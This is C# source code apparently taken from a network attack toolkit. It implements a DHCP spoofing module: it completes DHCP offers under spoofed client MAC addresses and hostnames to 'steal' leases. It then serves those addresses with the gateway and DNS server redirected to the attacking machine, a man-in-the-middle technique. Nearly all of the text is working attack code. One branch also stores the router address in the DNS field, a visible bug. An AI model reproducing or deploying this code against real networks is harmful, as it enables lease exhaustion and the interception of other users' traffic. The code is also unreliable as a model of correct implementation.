protected override void ParseConfiguration(Dictionary <string, NameValueItem[]> strNameValues, IEnvironment eEnviornment) { if (strNameValues.ContainsKey("gateway")) { thHandler.GatewayAddress = ConvertToIPAddress(strNameValues["gateway"])[0]; } if (strNameValues.ContainsKey("dns")) { thHandler.DNSAddress = ConvertToIPAddress(strNameValues["dns"])[0]; } thHandler.DHCPInPort = ConvertToInt(strNameValues["inPort"])[0]; thHandler.DHCPOutPort = ConvertToInt(strNameValues["outPort"])[0]; thHandler.LeaseDuration = ConvertToInt(strNameValues["leaseDuration"])[0]; foreach (NameValueItem nviPool in strNameValues["DHCPPool"]) { foreach (NameValueItem nvi in nviPool.GetChildsByName("DHCPItem")) { DHCPPoolItem dhItem = new DHCPPoolItem(ConvertToIPAddress(nvi.GetChildsByName("Address"))[0], ConvertToSubnetmask(nvi.GetChildsByName("Netmask"))[0], ConvertToIPAddress(nvi.GetChildsByName("Gateway"))[0], ConvertToIPAddress(nvi.GetChildsByName("DNSServer"))[0]); thHandler.AddToPool(dhItem); } } }
/// <summary> /// Gets the spoofed MAC for a stolen DHCP lease /// </summary> /// <param name="dhpItem">The DHCP lease to get the spoofed MAC address for</param> /// <returns>The spoofed MAC for a stolen DHCP lease</returns> public MACAddress GetSpoofedAddressforItem(DHCPPoolItem dhpItem) { if (dictPoolItemSpoofedMAC.ContainsKey(dhpItem)) { return(dictPoolItemSpoofedMAC[dhpItem]); } return(null); }
/// <summary> /// Handles a DHCP frame and sends responses and requests or leases addresses according to its contents /// </summary> /// <param name="dhcFrame">The DHCP frame to handle</param> /// <param name="udpFrame">The UDP frame</param> /// <param name="ipv4Frame">The IPv4 frame</param> /// <param name="tdf">The traffic description frame</param> /// <param name="fInputFrame">The original input frame</param> protected override void HandleDHCPFrame(DHCPFrame dhcFrame, UDP.UDPFrame udpFrame, IP.IPFrame ipv4Frame, TrafficDescriptionFrame tdf, Frame fInputFrame) { base.HandleDHCPFrame(dhcFrame, udpFrame, ipv4Frame, tdf, fInputFrame); EthernetFrame ethFrame = GetEthernetFrame(fInputFrame); bool bIsOffer = false; bool bIsACK = false; foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems()) { if (tlvItem.DHCPOptionType == DHCPOptions.DHCPMessageType) { if (dhcFrame.MessageType == DHCPType.BootReply && (DHCPMessageType)tlvItem.Data[0] == DHCPMessageType.Offer && lOpenClientTransactions.Contains(dhcFrame.TransactionID)) { bIsOffer = true; break; } if (dhcFrame.MessageType == DHCPType.BootReply && (DHCPMessageType)tlvItem.Data[0] == DHCPMessageType.ACK && lOpenClientTransactions.Contains(dhcFrame.TransactionID)) { bIsACK = true; break; } } } if (bIsOffer) { #region Client Process offer IPAddress ipaServer = ipv4Frame.SourceAddress; IPAddress myAddress = dhcFrame.OfferedAddress; DHCPFrame newDHCPFrame = new DHCPFrame(); newDHCPFrame.ClientAddress = IPAddress.Any; newDHCPFrame.ClientMac = dhcFrame.ClientMac; newDHCPFrame.Hardwarelen = 6; newDHCPFrame.HardwareType = eExNetworkLibrary.HardwareAddressType.Ethernet; newDHCPFrame.Hops = 0; newDHCPFrame.MessageType = DHCPType.BootRequest; newDHCPFrame.OfferedAddress = IPAddress.Any; newDHCPFrame.RelayAddress = IPAddress.Any; newDHCPFrame.RequestedFile = ""; newDHCPFrame.RequestedServerName = ""; newDHCPFrame.Secs = dhcFrame.Secs + 1; newDHCPFrame.ServerAddress = IPAddress.Any; newDHCPFrame.ValidIPFlag = true; newDHCPFrame.TransactionID = dhcFrame.TransactionID; DHCPTLVItem tlvItem = new DHCPTLVItem(); tlvItem.DHCPOptionType = DHCPOptions.DHCPMessageType; tlvItem.Data = new byte[] { (byte)DHCPMessageType.Request }; newDHCPFrame.AddDHCPTLVItem(tlvItem); tlvItem = new DHCPTLVItem(); tlvItem.DHCPOptionType = DHCPOptions.ClientID; byte[] bIDData = new byte[7]; bIDData[0] = (byte)HardwareAddressType.Ethernet; dhcFrame.ClientMac.AddressBytes.CopyTo(bIDData, 1); tlvItem.Data = bIDData; newDHCPFrame.AddDHCPTLVItem(tlvItem); tlvItem = new DHCPTLVItem(); tlvItem.DHCPOptionType = DHCPOptions.AddressRequest; tlvItem.Data = myAddress.GetAddressBytes(); newDHCPFrame.AddDHCPTLVItem(tlvItem); tlvItem = new DHCPTLVItem(); tlvItem.DHCPOptionType = DHCPOptions.Hostname; tlvItem.Data = Encoding.ASCII.GetBytes(strHostnameToSpoof + iIPIDCounter); newDHCPFrame.AddDHCPTLVItem(tlvItem); tlvItem = new DHCPTLVItem(); tlvItem.DHCPOptionType = DHCPOptions.DHCPServerID; tlvItem.Data = ipaServer.GetAddressBytes(); newDHCPFrame.AddDHCPTLVItem(tlvItem); UDP.UDPFrame newUDPFrame = new eExNetworkLibrary.UDP.UDPFrame(); newUDPFrame.DestinationPort = iDHCPOutPort; newUDPFrame.SourcePort = iDHCPInPort; newUDPFrame.EncapsulatedFrame = newDHCPFrame; IP.IPv4Frame newIPv4Frame = new eExNetworkLibrary.IP.IPv4Frame(); newIPv4Frame.Version = 4; newIPv4Frame.DestinationAddress = IPAddress.Broadcast; newIPv4Frame.SourceAddress = IPAddress.Any; newIPv4Frame.Protocol = eExNetworkLibrary.IP.IPProtocol.UDP; newIPv4Frame.EncapsulatedFrame = newUDPFrame; newIPv4Frame.Identification = (uint)IncrementIPIDCounter(); newIPv4Frame.TimeToLive = 128; ethFrame = new eExNetworkLibrary.Ethernet.EthernetFrame(); ethFrame.Destination = new MACAddress(new byte[] { 255, 255, 255, 255, 255, 255 }); ethFrame.Source = dhcFrame.ClientMac; ethFrame.EtherType = eExNetworkLibrary.EtherType.IPv4; ethFrame.EncapsulatedFrame = newIPv4Frame; TrafficDescriptionFrame tdFrame = new TrafficDescriptionFrame(null, DateTime.Now); tdFrame.EncapsulatedFrame = ethFrame; if (tdf != null && tdf.SourceInterface != null) { tdf.SourceInterface.Send(tdFrame); } #endregion } else if (bIsACK) { #region Client Process ACK if (tdf != null && tdf.SourceInterface != null) { IPInterface ipiSource = tdf.SourceInterface; DHCPPool dhPool = GetPoolForInterface(ipiSource); DHCPPoolItem dpiItem = new DHCPPoolItem(); dpiItem.Address = dhcFrame.OfferedAddress; if (dhPool.GetItemForAddress(dpiItem.Address) == null) { if (bRedirectGateway) { if (ipaGateway == null) { dpiItem.Gateway = ipiSource.IpAddresses[0]; } else { dpiItem.Gateway = ipaGateway; } } else { IPAddress ipGateway = IPAddress.Any; foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems()) { if (tlvItem.DHCPOptionType == DHCPOptions.Router) { ipGateway = new IPAddress(tlvItem.Data); break; } } dpiItem.DNSServer = ipGateway; } if (bRedirectDNSServer) { if (ipaDNSServer == null) { dpiItem.DNSServer = ipiSource.IpAddresses[0]; } else { dpiItem.DNSServer = ipaDNSServer; } } else { IPAddress ipDNS = IPAddress.Any; foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems()) { if (tlvItem.DHCPOptionType == DHCPOptions.DomainNameServer) { ipDNS = new IPAddress(tlvItem.Data); break; } } dpiItem.DNSServer = ipDNS; } IPAddress ipServer = null; foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems()) { if (tlvItem.DHCPOptionType == DHCPOptions.DHCPServerID) { ipServer = new IPAddress(tlvItem.Data); break; } } dpiItem.DHCPServer = ipServer; dpiItem.Netmask = ipiSource.Subnetmasks[0]; dpiItem.DHCPServerMAC = ethFrame.Source; AddPoolItem(dpiItem, dhPool, ipiSource); dictPoolItemSpoofedMAC.Add(dpiItem, dhcFrame.ClientMac); if (dictIPSpoofedMACs.ContainsKey(dpiItem.Address)) { dictIPSpoofedMACs.Remove(dpiItem.Address); } dictIPSpoofedMACs.Add(dpiItem.Address, dhcFrame.ClientMac); lServers.Add(ipv4Frame.SourceAddress); InvokeAddressStolen(new DHCPServerEventArgs(dhPool, dpiItem, ipiSource)); } } lOpenClientTransactions.Remove(dhcFrame.TransactionID); #endregion } }